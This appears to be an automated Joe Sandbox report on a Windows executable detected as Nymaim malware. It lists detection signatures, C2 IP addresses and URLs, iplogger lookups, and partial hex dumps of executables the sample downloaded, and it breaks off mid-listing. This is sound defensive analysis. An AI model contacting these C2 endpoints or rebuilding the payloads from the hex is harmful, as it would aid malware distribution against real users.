Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	715150
MD5:	a3b774ed5023f56970eea0668ae65703
SHA1:	3aebfec7980d1db1edbeccbb29044ea677be304b
SHA256:	f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
Tags:	exe
Infos:

Detection

Nymaim

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Nymaim

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

May check the online IP address of the machine

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Downloads executable code via HTTP

Enables debug privileges

Drops files with a non-matching file extension (content does not match file extension)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Drops PE files

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

Antivirus detection for URL or domain

Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	URL Reputation: Label: malware
Source: http://171.22.30.106/library.php	URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://85.31.46.167/software.phpZ

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]

ReversingLabs: Detection: 28%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2

Source:	Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source:	Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

Networking

May check the online IP address of the machine

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

DNS query: name: iplogger.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 208.67.104.97
Source: Malware configuration extractor	IPs: 85.31.46.167

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83
Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:32 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:33 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167

Source: file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.php
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.php$
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpCoo
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpO
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpP
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpZ
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpl
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpll
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpstem32
Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.31.46.167/software.phpx
Source: Cleaner.exe, 00000021.00000002.650563112.0000024B1A9C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://iplogger.org
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr	String found in binary or memory: http://upx.sf.net
Source: Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.agfamonotype.
Source: Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmled.
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designerseK
Source: Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersers
Source: Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersp
Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersrsivo
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Cleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 